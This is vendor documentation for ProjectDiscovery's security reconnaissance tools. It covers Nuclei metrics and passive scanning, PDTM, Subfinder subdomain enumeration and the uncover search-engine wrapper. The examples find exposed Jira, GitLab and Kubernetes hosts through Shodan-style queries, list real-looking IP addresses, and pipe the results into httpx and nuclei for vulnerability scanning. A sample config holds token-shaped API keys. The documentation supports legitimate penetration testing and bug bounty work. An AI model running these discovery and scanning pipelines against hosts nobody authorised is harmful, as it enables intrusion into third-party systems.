More info on the SARIF output is documented [here](https://github.com/projectdiscovery/nuclei/pull/2925).
These are **not official** Nuclei viewers, and Nuclei assumes no liability for any of these options to visualize **Nuclei** results. They are simply publicly available options for visualizing SARIF files.
## Scan **Metrics**
Nuclei exposes running scan metrics on local port `9092` when the `-metrics` flag is used; they can be accessed at **localhost:9092/metrics**. The default port used to expose scan information can be changed with the `-metrics-port` flag.
Here is an example of querying `metrics` while running nuclei as `nuclei -t cves/ -l urls.txt -metrics`:
```bash
curl -s localhost:9092/metrics | jq .
```
```json
{
"duration": "0:00:03",
"errors": "2",
"hosts": "1",
"matched": "0",
"percent": "99",
"requests": "350",
"rps": "132",
"startedAt": "2021-03-27T18:02:18.886745+05:30",
"templates": "256",
"total": "352"
}
```
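If port `9092` is already in use, the same metrics can be exposed on another port with the `-metrics-port` flag (a minimal sketch; the port and targets are placeholders):
```bash
# expose scan metrics on port 9093 instead of the default 9092
nuclei -t cves/ -l urls.txt -metrics -metrics-port 9093 &
curl -s localhost:9093/metrics | jq .
```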
## Passive Scan
The Nuclei engine supports passive mode scanning for HTTP-based templates using its file support. With this, HTTP-based templates can be run against locally stored HTTP response data collected from any other tool.
```sh
nuclei -passive -target http_data
```
Passive mode support is limited to templates that use `{{BaseURL}}` or `{{BaseURL/}}` as the base path.
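As a rough sketch of such a workflow (assuming httpx and its `-sr, -srd` store-response flags for saving raw responses; file and directory names are placeholders), responses can be collected first and then scanned offline:
```sh
# save raw HTTP responses to the http_data directory, then scan them in passive mode
httpx -l urls.txt -sr -srd http_data
nuclei -passive -target http_data
```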
## Running With Docker
If Nuclei was installed within a Docker container based on the [installation instructions](./install),
the executable does not have the context of the host machine. This means that the executable will not be able to access
local files such as those used for input lists or templates. To resolve this, the container should be run with volumes
mapped to the local filesystem to allow access to these files.
### Basic Usage
This example runs a Nuclei container against `google.com`, prints the results to JSON and removes the container once it
has completed:
```sh
docker run --rm projectdiscovery/nuclei -u google.com -jsonl
```
### Using Volumes
This example runs a Nuclei container against a list of URLs, writes the results to a `.jsonl` file and removes the
container once it has completed.
```sh
# This assumes there's a file called `urls.txt` in the current directory
docker run --rm -v ./:/app/ projectdiscovery/nuclei -l /app/urls.txt -jsonl /app/results.jsonl
# The results will be written to `./results.jsonl` on the host machine once the container has completed
```
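Similarly, locally stored templates can be made available to the container by mounting a second volume (a sketch; the `custom-templates` directory is a placeholder):
```sh
# mount the current directory for the URL list and a local template directory for -t
docker run --rm -v ./:/app/ -v ./custom-templates/:/templates/ projectdiscovery/nuclei -l /app/urls.txt -t /templates/ -jsonl /app/results.jsonl
```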
# PDTM Install
Source: https://docs.projectdiscovery.io/tools/pdtm/install
Learn how to install PDTM and get started
Enter the command below in a terminal to install PDTM using Go.
```sh
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
```
```bash
https://github.com/projectdiscovery/pdtm/releases
```
* Download the latest binary for your OS.
* Unzip the ready-to-run binary.
## Installation Notes
* PDTM requires the latest version of [**Go**](https://go.dev/doc/install)
* Projects are installed by downloading the released project binary. This means that projects can only be installed on the platforms for which binaries have been published.
* The path `$HOME/.pdtm/go/bin` is added to the `$PATH` variable by default
# PDTM Overview
Source: https://docs.projectdiscovery.io/tools/pdtm/overview
Use ProjectDiscovery Tool Manager to download and organize your tools
ProjectDiscovery Tool Manager, or PDTM, is an easy way to download your ProjectDiscovery tools and keep them organized and easy to access, update, and more. For users interested in taking advantage of multiple ProjectDiscovery tools, we recommend downloading PDTM rather than downloading the binary for each tool separately.
Check out [the great blog](https://blog.projectdiscovery.io/getting-started-with-projectdiscovery-in-linux-and-windows/) for getting started with ProjectDiscovery tools using Linux and Windows.
You can access the PDTM [GitHub repo here](https://github.com/projectdiscovery/pdtm).
## Support
Questions about using PDTM? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running PDTM
Source: https://docs.projectdiscovery.io/tools/pdtm/running
Learn about PDTM with examples including commands and output
For all of the flags and options available for `PDTM` be sure to check out the [Usage](/tools/pdtm/usage) page. On this page we'll share an example of running PDTM.
If you have questions, reach out to us through [Help](/help).
## Basic Example
```console
$ pdtm -install-all
____
____ ____/ / /_____ ___
/ __ \/ __ / __/ __ __ \
/ /_/ / /_/ / /_/ / / / / /
/ .___/\__,_/\__/_/ /_/ /_/
/_/ v0.0.1
projectdiscovery.io
[INF] Installed httpx v1.1.1
[INF] Installed nuclei v2.6.3
[INF] Installed naabu v2.6.3
[INF] Installed dnsx v2.6.3
```
# PDTM Usage
Source: https://docs.projectdiscovery.io/tools/pdtm/usage
Learn PDTM usage including flags and options
## Access help
Use `pdtm -h` to display all help options.
## PDTM options
```console
Usage:
./pdtm [flags]
Flags:
CONFIG:
-config string cli flag configuration file (default "$HOME/.config/pdtm/config.yaml")
-bp, -binary-path string custom location to download project binary (default "$HOME/.pdtm/go/bin")
INSTALL:
-i, -install string[] install single or multiple project by name (comma separated)
-ia, -install-all install all the projects
-ip, -install-path append path to PATH environment variables
UPDATE:
-u, -update string[] update single or multiple project by name (comma separated)
-ua, -update-all update all the projects
-up, -self-update update pdtm to latest version
-duc, -disable-update-check disable automatic pdtm update check
REMOVE:
-r, -remove string[] remove single or multiple project by name (comma separated)
-ra, -remove-all remove all the projects
-rp, -remove-path remove path from PATH environment variables
DEBUG:
-sp, -show-path show the current binary path then exit
-version show version of the project
-v, -verbose show verbose output
-nc, -no-color disable output content coloring (ANSI escape codes)
-disable-changelog, -dc disable release changelog in output
```
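For example, the install, update, and remove flags above can be used as follows (tool names are just examples):
```bash
pdtm -i subfinder,httpx   # install specific projects
pdtm -u nuclei            # update a single project
pdtm -ua                  # update all installed projects
pdtm -r naabu             # remove a project
```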
# Installing Subfinder
Source: https://docs.projectdiscovery.io/tools/subfinder/install
Learn about how to install and get started with Subfinder
```bash
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
```
Subfinder requires the latest **Go** version to install successfully.
```bash
brew install subfinder
```
Supported on **macOS** (or Linux)
```bash
docker pull projectdiscovery/subfinder:latest
```
```bash
git clone https://github.com/projectdiscovery/subfinder.git; \
cd subfinder/v2/cmd/subfinder; \
go build; \
mv subfinder /usr/local/bin/; \
subfinder -version;
```
Subfinder requires the latest **Go** version to install successfully.
```bash
https://github.com/projectdiscovery/subfinder/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation notes
* Subfinder requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export PATH=$PATH:$HOME/go/bin >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/subfinder`
## Post install configuration
Subfinder is available for use immediately after installation; however, the following services require API keys to be configured before they will work:
[BeVigil](https://bevigil.com/osint-api), [BinaryEdge](https://binaryedge.io), [BufferOver](https://tls.bufferover.run), [C99](https://api.c99.nl/), [Censys](https://censys.io), [CertSpotter](https://sslmate.com/certspotter/api/), [Chaos](https://chaos.projectdiscovery.io),
[Chinaz](http://my.chinaz.com/ChinazAPI/DataCenter/MyDataApi), [DNSDB](https://api.dnsdb.info), [Fofa](https://fofa.info/static_pages/api_help), [FullHunt](https://fullhunt.io), [GitHub](https://github.com), [Intelx](https://intelx.io),
[PassiveTotal](http://passivetotal.org), [quake](https://quake.360.cn), [Robtex](https://www.robtex.com/api/), [SecurityTrails](http://securitytrails.com), [Shodan](https://shodan.io), [ThreatBook](https://x.threatbook.cn/en),
[VirusTotal](https://www.virustotal.com), [WhoisXML API](https://whoisxmlapi.com/), ZoomEye API [china](https://api.zoomeye.org) - [worldwide](https://api.zoomeye.hk),
[dnsrepo](https://dnsrepo.noc.org), [Hunter](https://hunter.qianxin.com/), [Facebook](https://developers.facebook.com), [BuiltWith](https://api.builtwith.com/domain-api)
You can also use the `subfinder -ls` command to display all the available sources.
These values are stored in the `$HOME/.config/subfinder/provider-config.yaml` file which will be created when you run the tool for the first time.
The configuration file uses the YAML format. Multiple API keys can be specified for each of these services, one of which will be used for enumeration.
Composite keys for sources like Censys, PassiveTotal, Fofa, Intelx and 360quake need to be separated with a colon (:).
## Example provider config
An example provider config file:
```
binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
redhuntlabs:
- ENDPOINT:API_TOKEN
- https://reconapi.redhuntlabs.com/community/v1/domains/subdomains:joEPzJJp2AuOCw7teAj63HYrPGnsxuPQ
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeyeapi:
- zoomeye.hk:4f73021d-ff95-4f53-937f-83d6db719eec
quake:
- 0cb9030c-0a40-48a3-b8c4-fca28e466ba3
facebook:
- APP_ID:APP_SECRET
intelx:
- HOST:API_KEY
- 2.intelx.io:s4324-b98b-41b2-220e8-3320f6a1284d
```
## RedHunt Lab Attack Surface Recon API
RedHunt Labs's [Attack Surface Recon API](https://devportal.redhuntlabs.com/) has different API endpoints depending on the user's subscription. Make sure to add the appropriate endpoint before running any scans.
## ZoomEye API
Before conducting any scans, please ensure you are using the correct host to comply with geographical access restrictions of the ZoomEye API:
* **zoomeye.org** is exclusively for users within China.
* **zoomeye.hk** is for users outside China.
# Subfinder Overview
Source: https://docs.projectdiscovery.io/tools/subfinder/overview
A robust discovery tool for passive enumeration on valid subdomains
## What is **Subfinder?**
Subfinder is a subdomain discovery tool that finds and returns valid subdomains for websites.
Using passive online sources, it has a simple modular architecture optimized for speed. Subfinder is built for one thing - passive subdomain enumeration, and it does that very well.
Subfinder complies with all the passive source licenses and usage restrictions for its sources. The passive model guarantees speed and stealthiness that can be leveraged by both penetration testers and bug bounty hunters alike.
[Check out this post on all of Subfinder's features](https://blog.projectdiscovery.io/do-you-really-know-subfinder-an-in-depth-guide-to-all-features-of-subfinder-beginner-to-advanced/) from the ProjectDiscovery Blog for more.
## Features and capabilities
* Fast and powerful resolution and wildcard elimination modules
* Curated passive sources to maximize results
* Multiple supported output formats (JSON, file, stdout)
* Optimized for speed and lightweight on resources
* STDIN/OUT support enables easy integration into workflows
## Additional Subfinder resources
As an open source tool with a robust community, Subfinder has a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://securitytrails.com/blog/subfinder](https://securitytrails.com/blog/subfinder)
* [https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/](https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/)
* [https://dhiyaneshgeek.github.io/research,bug/bounty/2024/01/03/subfinder-securitytrails/](https://dhiyaneshgeek.github.io/research,bug/bounty/2024/01/03/subfinder-securitytrails/)
## Support
Questions about using Subfinder? Issues working through installation? Cool story or use case you want to share? Get in touch! Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running
Source: https://docs.projectdiscovery.io/tools/subfinder/running
Learn about running Subfinder with examples including commands and output
For all of the flags and options available for `Subfinder` be sure to check out the [Usage](/tools/subfinder/usage) page. On this page we'll share examples of running Subfinder with specific flags and goals,
and the output you can expect from each. *If you have questions, reach out to us through [Help](/help).*
## Basic Usage
To run Subfinder on a specific target use the `-d` flag to specify the domain.
```
subfinder -d hackerone.com
__ _____ __
_______ __/ /_ / __(_)___ ____/ /__ _____
/ ___/ / / / __ \/ /_/ / __ \/ __ / _ \/ ___/
(__ ) /_/ / /_/ / __/ / / / / /_/ / __/ /
/____/\__,_/_.___/_/ /_/_/ /_/\__,_/\___/_/ v2.4.9
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
By using subfinder, you also agree to the terms of the APIs used.
[INF] Enumerating subdomains for hackerone.com
www.hackerone.com
support.hackerone.com
links.hackerone.com
api.hackerone.com
o1.email.hackerone.com
go.hackerone.com
3d.hackerone.com
resources.hackerone.com
a.ns.hackerone.com
b.ns.hackerone.com
mta-sts.hackerone.com
docs.hackerone.com
mta-sts.forwarding.hackerone.com
gslink.hackerone.com
hackerone.com
info.hackerone.com
mta-sts.managed.hackerone.com
events.hackerone.com
[INF] Found 18 subdomains for hackerone.com in 3 seconds 672 milliseconds
```
## Pipe Results to Other Tools
The subdomains discovered can be piped to other tools. For example, you can pipe the discovered subdomains to httpx which will then find running HTTP servers on the host.
```
echo hackerone.com | subfinder -silent | httpx -silent
http://hackerone.com
http://www.hackerone.com
http://docs.hackerone.com
http://api.hackerone.com
https://docs.hackerone.com
http://mta-sts.managed.hackerone.com
```
## Subfinder and Docker
Pull the latest tagged `subfinder` Docker image using:
```
docker pull projectdiscovery/subfinder:latest
```
Run `subfinder` using the Docker image:
```
docker run projectdiscovery/subfinder:latest -d hackerone.com
```
Run `subfinder` using the Docker image with a local config file:
```
docker run -v $CONFIG/subfinder:/root/.config/subfinder -t projectdiscovery/subfinder -d hackerone.com
```
## Subfinder Go library
`subfinder` can also be used as a library; a minimal example of using the subfinder SDK is available [in the example library.](https://github.com/projectdiscovery/subfinder/blob/dev/v2/examples/main.go)
# Subfinder Usage
Source: https://docs.projectdiscovery.io/tools/subfinder/usage
Learn Subfinder usage including input, flags, and filters
## Access help
Use `subfinder -h` to display all help options.
## Subfinder help options
```
Flags:
INPUT:
-d, -domain string[] domains to find subdomains for
-dL, -list string file containing list of domains for subdomain discovery
SOURCE:
-s, -sources string[] specific sources to use for discovery (-s crtsh,github). Use -ls to display all available sources.
-recursive use only sources that can handle subdomains recursively (e.g. subdomain.domain.tld vs domain.tld)
-all use all sources for enumeration (slow)
-es, -exclude-sources string[] sources to exclude from enumeration (-es alienvault,zoomeyeapi)
FILTER:
-m, -match string[] subdomain or list of subdomain to match (file or comma separated)
-f, -filter string[] subdomain or list of subdomain to filter (file or comma separated)
RATE-LIMIT:
-rl, -rate-limit int maximum number of http requests to send per second
-rls value maximum number of http requests to send per second for providers in key=value format (-rls "hackertarget=10/s,shodan=15/s")
-t int number of concurrent goroutines for resolving (-active only) (default 10)
UPDATE:
-up, -update update subfinder to latest version
-duc, -disable-update-check disable automatic subfinder update check
OUTPUT:
-o, -output string file to write output to
-oJ, -json write output in JSONL(ines) format
-oD, -output-dir string directory to write output (-dL only)
-cs, -collect-sources include all sources in the output (-json only)
-oI, -ip include host IP in output (-active only)
CONFIGURATION:
-config string flag config file (default "$CONFIG/subfinder/config.yaml")
-pc, -provider-config string provider config file (default "$CONFIG/subfinder/provider-config.yaml")
-r string[] comma separated list of resolvers to use
-rL, -rlist string file containing list of resolvers to use
-nW, -active display active subdomains only
-proxy string http proxy to use with subfinder
-ei, -exclude-ip exclude IPs from the list of domains
DEBUG:
-silent show only subdomains in output
-version show version of subfinder
-v show verbose output
-nc, -no-color disable color in output
-ls, -list-sources list all available sources
OPTIMIZATION:
-timeout int seconds to wait before timing out (default 30)
-max-time int minutes to wait for enumeration results (default 10)
```
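As an illustrative combination of the flags above (file names are placeholders), a list of domains can be enumerated using all sources and the results written to a file:
```bash
# enumerate every domain in domains.txt with all sources and save only the subdomains
subfinder -dL domains.txt -all -silent -o subdomains.txt
```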
# uncover Install
Source: https://docs.projectdiscovery.io/tools/uncover/install
Learn how to install uncover and get started
Enter the command below in a terminal to install uncover using Go.
```bash
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
```
## Installation Notes
* uncover requires the latest version of [**Go**](https://go.dev/doc/install)
# uncover Overview
Source: https://docs.projectdiscovery.io/tools/uncover/overview
A Go wrapper using APIs to discover exposed hosts
`uncover` is a Go wrapper using APIs from well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and use the results with your current pipeline tools.
The uncover [GitHub repo is available here](https://github.com/projectdiscovery/uncover)
## Features
* Query multiple search engines at once
* Available Search engine support
* [Shodan](https://www.shodan.io)
* [Censys](https://search.censys.io)
* [FOFA](https://fofa.info)
* [Hunter](https://hunter.qianxin.com)
* [Quake](https://quake.360.net/quake/#/index)
* [Zoomeye](https://www.zoomeye.org)
* [Netlas](https://netlas.io/)
* [CriminalIP](https://www.criminalip.io)
* [PublicWWW](https://publicwww.com)
* [HunterHow](https://hunter.how)
* Multiple API key input support
* Automatic API key randomization
* **stdin** / **stdout** support for input
## Support
Questions about using `uncover`? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running uncover
Source: https://docs.projectdiscovery.io/tools/uncover/running
Learn about running uncover including examples
## Basic Usage
For all of the flags and options available for **uncover** be sure to check out the [Usage](/tools/uncover/usage) page.
If you have questions, reach out to us through [Help](/help).
### Default run:
**uncover** supports multiple ways to provide the query, including **stdin** and the `-q` flag. By default, the `shodan` engine is used for the search if no engine is specified.
```console
echo 'ssl:"Uber Technologies, Inc."' | uncover
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
107.180.12.116:993
107.180.26.155:443
104.244.99.31:443
161.28.20.79:443
104.21.8.108:443
198.71.233.203:443
104.17.237.13:443
162.255.165.171:443
12.237.119.61:443
192.169.250.211:443
104.16.251.50:443
```
Running **uncover** with **file** input containing multiple search queries, one per line.
```console
cat dorks.txt
ssl:"Uber Technologies, Inc."
title:"Grafana"
```
```console
uncover -q dorks.txt
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
107.180.12.116:993
107.180.26.155:443
104.244.99.31:443
161.28.20.79:443
104.21.8.108:443
198.71.233.203:443
2607:7c80:54:3::74:3001
104.198.55.35:80
46.101.82.244:3000
34.147.126.112:80
138.197.147.213:8086
```
### Single query against multiple search engines
**uncover** supports multiple search engines; **shodan** is used by default, and the `-e` flag can be used to run the same query against any or all supported engines.
```console
echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye,netlas,criminalip
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
176.31.249.189:5001
13.211.116.80:443
43.130.1.221:631
192.195.70.29:443
52.27.22.181:443
117.48.120.226:8889
106.52.115.145:49153
13.69.135.128:443
193.35.99.158:443
18.202.109.218:8089
101.36.105.97:21379
42.194.226.30:2626
```
### Multiple queries against multiple search engines
```console
uncover -shodan 'http.component:"Atlassian Jira"' -censys 'services.software.product=`Jira`' -fofa 'app="ATLASSIAN-JIRA"' -quake 'Jira' -hunter 'Jira' -zoomeye 'app:"Atlassian JIRA"' -netlas 'jira' -criminalip 'Jira'
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
104.68.37.129:443
162.222.160.42:443
34.255.84.133:443
52.204.121.166:443
23.198.29.120:443
136.156.180.95:443
54.194.233.15:443
104.117.55.155:443
149.81.4.6:443
54.255.218.95:443
3.223.137.57:443
83.228.124.171:443
23.202.195.82:443
52.16.59.25:443
18.159.145.227:443
104.105.53.236:443
```
### Shodan-InternetDB API
**uncover** supports the [shodan-internetdb](https://internetdb.shodan.io) API to pull available ports for a given IP/CIDR input.
`shodan-idb` is used as the **default** engine when an **IP/CIDR** is provided as input; otherwise, the `shodan` search engine is used.
```console
echo 51.83.59.99/24 | uncover
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
51.83.59.1:53
51.83.59.1:10000
51.83.59.2:53
51.83.59.3:25
51.83.59.3:80
51.83.59.3:389
51.83.59.3:443
51.83.59.3:465
51.83.59.3:587
51.83.59.3:993
```
### [Awesome Search Queries Integration](https://github.com/projectdiscovery/awesome-search-queries)
The `-asq, -awesome-search-queries` flag allows you to use predefined awesome search queries to discover exposed assets on the internet. This feature leverages a curated list of queries that are known to yield interesting results. To use this feature, simply specify the `-asq` flag followed by the desired query. For example, to search for exposed Jira instances, you can use:
```console
uncover -asq jira -silent
....
```
### Field Format
The `-f, -field` flag can be used to indicate which fields to return; currently `ip`, `port`, and `host` are supported.
```console
uncover -q jira -f host -silent
ec2-44-198-22-253.compute-1.amazonaws.com
ec2-18-246-31-139.us-west-2.compute.amazonaws.com
tasks.devrtb.com
leased-line-91-149-128-229.telecom.by
74.242.203.213.static.inetbone.net
ec2-52-211-7-108.eu-west-1.compute.amazonaws.com
ec2-54-187-161-180.us-west-2.compute.amazonaws.com
185-2-52-226.static.nucleus.be
ec2-34-241-80-255.eu-west-1.compute.amazonaws.com
```
### Field Formatting
The `-f, -field` flag can also be used to customize the output format. For example, with `uncover -f https://ip:port/version`, `ip:port` will be replaced with results in the output while keeping the defined format. It can also be used to specify a known scheme/path/file in order to prepare the output so that it can be passed directly as input to other tools in the pipeline.
```console
echo kubernetes | uncover -f https://ip:port/version -silent
https://35.222.229.38:443/version
https://52.11.181.228:443/version
https://35.239.255.1:443/version
https://34.71.48.11:443/version
https://130.211.54.173:443/version
https://54.184.250.232:443/version
```
Output of **uncover** can be further piped to other projects in the workflow that accept **stdin** as input, for example:
* `uncover -q example -f ip | naabu` - Runs [naabu](https://github.com/projectdiscovery/naabu) for port scanning on the found hosts.
* `uncover -q title:GitLab | httpx` - Runs [httpx](https://github.com/projectdiscovery/httpx) for web server probing on the found results.
* `uncover -q 51.83.59.99/24 | httpx` - Runs [httpx](https://github.com/projectdiscovery/httpx) on the host/ports obtained from shodan-internetdb.
```console
uncover -q http.title:GitLab -silent | httpx -silent
https://15.185.150.109
https://139.162.137.16
https://164.68.115.243
https://135.125.215.186
https://163.172.59.119
http://15.236.10.197
https://129.206.117.248
```
* `uncover -q 'org:"Example Inc."' | httpx | nuclei` - Runs [httpx](https://github.com/projectdiscovery/httpx) / [nuclei](https://github.com/projectdiscovery/nuclei) for vulnerability assessment.
![image](https://user-images.githubusercontent.com/8293321/156753063-86ea4c5d-92ad-4c24-a7af-871c12aa278c.png)
# uncover Usage
Source: https://docs.projectdiscovery.io/tools/uncover/usage
Learn uncover usage including flags and filters
## Access help
Use `uncover -h` to display all of the help options.
## uncover options
```console
Usage:
./uncover [flags]
Flags:
INPUT:
-q, -query string[] search query, supports: stdin,file,config input (example: -q 'example query', -q 'query.txt')
-e, -engine string[] search engine to query (shodan,shodan-idb,fofa,censys,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow) (default shodan)
-asq, -awesome-search-queries string[] use awesome search queries to discover exposed assets on the internet (example: -asq 'jira')
SEARCH-ENGINE:
-s, -shodan string[] search query for shodan (example: -shodan 'query.txt')
-sd, -shodan-idb string[] search query for shodan-idb (example: -shodan-idb 'query.txt')
-ff, -fofa string[] search query for fofa (example: -fofa 'query.txt')
-cs, -censys string[] search query for censys (example: -censys 'query.txt')
-qk, -quake string[] search query for quake (example: -quake 'query.txt')
-ht, -hunter string[] search query for hunter (example: -hunter 'query.txt')
-ze, -zoomeye string[] search query for zoomeye (example: -zoomeye 'query.txt')
-ne, -netlas string[] search query for netlas (example: -netlas 'query.txt')
-cl, -criminalip string[] search query for criminalip (example: -criminalip 'query.txt')
-pw, -publicwww string[] search query for publicwww (example: -publicwww 'query.txt')
-hh, -hunterhow string[] search query for hunterhow (example: -hunterhow 'query.txt')
CONFIG:
-pc, -provider string provider configuration file (default "$CONFIG/uncover/provider-config.yaml")
-config string flag configuration file (default "$CONFIG/uncover/config.yaml")
-timeout int timeout in seconds (default 30)
-rl, -rate-limit int maximum number of http requests to send per second
-rlm, -rate-limit-minute int maximum number of requests to send per minute
-retry int number of times to retry a failed request (default 2)
OUTPUT:
-o, -output string output file to write found results
-f, -field string field to display in output (ip,port,host) (default "ip:port")
-j, -json write output in JSONL(ines) format
-r, -raw write raw output as received by the remote api
-l, -limit int limit the number of results to return (default 100)
-nc, -no-color disable colors in output
DEBUG:
-silent show only results in output
-version show version of the project
-v show verbose output
```
## Notes:
* **keys/credentials** must be configured before running or using this project.
* The `query` flag supports **all and only the filters supported by the search engine.**
* Results are limited to `100` by default and can be increased with the `limit` flag (see the example below).
* The `shodan-idb` API doesn't require an API key and works out of the box.
* The `shodan-idb` API is used as the **default** engine when an **IP/CIDR** is provided as input.
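For instance, the default result limit can be raised with the `-l, -limit` flag (the query is just an example):
```bash
uncover -q 'ssl:"Uber Technologies, Inc."' -l 200 -silent
```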